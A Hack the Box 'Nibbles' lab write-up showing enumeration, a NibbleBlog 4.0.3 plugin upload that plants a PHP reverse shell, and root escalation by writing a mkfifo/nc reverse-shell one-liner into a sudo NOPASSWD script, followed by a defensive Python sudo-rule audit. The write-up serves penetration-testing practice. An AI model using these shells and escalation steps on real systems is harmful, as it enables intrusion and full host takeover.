HTB – Nibbles

Today we are going to solve another CTF challenge, “Nibbles”, which is categorized as a retired lab presented by Hack the Box for online penetration testing practice.

Level: Easy

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are accessible online, they have static IPs. The IP of Nibbles is so let’s start with nmap port enumeration.

c:\Users\jacco>nmap -T4 -sC -sV
Starting Nmap 7.70 ( ) at 2019-03-12 21:23 W. Europe Standard Time
Nmap scan report for
Host is up (0.031s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.25 seconds

Port 80 is open, so let’s open the IP in our browser to see whether a website is hosted on it. After opening the IP in the browser, we were greeted by the following page.

Then we use curl to send an HTTP request on and notice /nibbleblog/ in an HTML comment in the response, which could be a web directory.

c:\Users\jacco>curl -v
* Rebuilt URL to:
* Trying
* Connected to ( port 80 (#0)
> GET / HTTP/1.1
> Host:
> User-Agent: curl/7.55.1
> Accept: */*
< HTTP/1.1 200 OK
< Date: Wed, 13 Mar 2019 17:25:49 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Thu, 28 Dec 2017 20:19:50 GMT
< ETag: "5d-5616c3cf7fa77"
< Accept-Ranges: bytes
< Content-Length: 93
< Vary: Accept-Encoding
< Content-Type: text/html
<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->
* Connection #0 to host left intact

So we browse to the directory, which puts us on the main page of a blogging platform, NibbleBlog Yum Yum.

We find the Admin Panel on:


After a couple of tests we find the credentials:


As we see under Settings, the version is Nibbleblog 4.0.3 “Coffee”.
We look for exploits for that version:

Proof of Concept

  1. Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
  2. Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
  3. Upload PHP shell, ignore warnings
  4. Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.

Get shell:

locate webshell
cp /usr/share/webshells/php/php-reverse-shell.php .
# Edit the IP in php-reverse-shell.php
nc -lvp 443
# Upload the .php file using the My image plugin of Nibbleblog

Now let’s finish the task by grabbing the user.txt and root.txt files.

nibbler@Nibbles:/home/nibbler$ unzip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ ls
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -al
ls -al
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,

User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "mkfifo /tmp/flahty; nc 5555 0</tmp/flahty | /bin/sh >/tmp/flahty 2>&1; rm /tmp/flahty" >
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -u root ./
sudo -u root ./

On the other side, we have a netcat listener, which has given us root access. Let’s finish this task and grab the root.txt file.

C:\Users\jacco>nc -lvp 5555
listening on [any] 5555 ... inverse host lookup failed: h_errno 11004: NO_DATA
connect to [] from (UNKNOWN) [] 43462: NO_DATA

python3 -c 'import pty;pty.spawn("/bin/bash")'
root@Nibbles:~# cd /root
cd /root
root@Nibbles:~# cat root.txt
cat root.txt
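
The sudo rule in the session above points at a script inside nibbler's own home directory, which is why the NOPASSWD entry is equivalent to root. As an added example (not part of the original writeup), this Python audit parses `sudo -l` output and flags such rules; the script name example.sh, uid 1001 and the file metadata table are constructed placeholders.

```python
import re
import stat
from pathlib import PurePosixPath

# Constructed sample: `sudo -l` output shaped like the session above. The script
# name example.sh is a placeholder, not the file name from the box.
SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/example.sh
    (root) /usr/bin/apt-get update
"""

# Constructed file metadata: path -> (owner uid, mode). uid 1001 stands for nibbler.
FAKE_FS = {
    "/": (0, 0o40755), "/home": (0, 0o40755), "/home/nibbler": (1001, 0o40755),
    "/home/nibbler/personal": (1001, 0o40755),
    "/home/nibbler/personal/stuff": (1001, 0o40755),
    "/home/nibbler/personal/stuff/example.sh": (1001, 0o100777),
    "/usr": (0, 0o40755), "/usr/bin": (0, 0o40755), "/usr/bin/apt-get": (0, 0o100755),
}

# "(runas) [TAG: ...] /absolute/command [args]" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)")

def parse_rules(text):
    """Return (runas, nopasswd, command path) per command line of `sudo -l` output."""
    hits = (RULE.match(line) for line in text.splitlines())
    return [(m["runas"], "NOPASSWD:" in m["tags"], m["cmd"]) for m in hits if m]

def tamper_points(cmd, lookup):
    """List the command and parent directories that a non-root user can modify."""
    findings = []
    path = PurePosixPath(cmd)
    for part in (path, *path.parents):
        uid, mode = lookup(str(part)) or (None, 0)
        if uid is None:
            findings.append(f"{part}: missing")
        elif uid != 0 or mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{part}: uid={uid} mode={stat.filemode(mode)}")
    return findings

def audit(text, lookup=FAKE_FS.get):
    """Return {command: (nopasswd, tamper points)} for every sudo rule in the output."""
    return {cmd: (nopw, tamper_points(cmd, lookup)) for _, nopw, cmd in parse_rules(text)}
```

On a real host, replace the lookup with one built on `os.stat`. A rule is clean only when the command and every parent directory are owned by root and not group or world writable.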

Author: Jacco Straathof
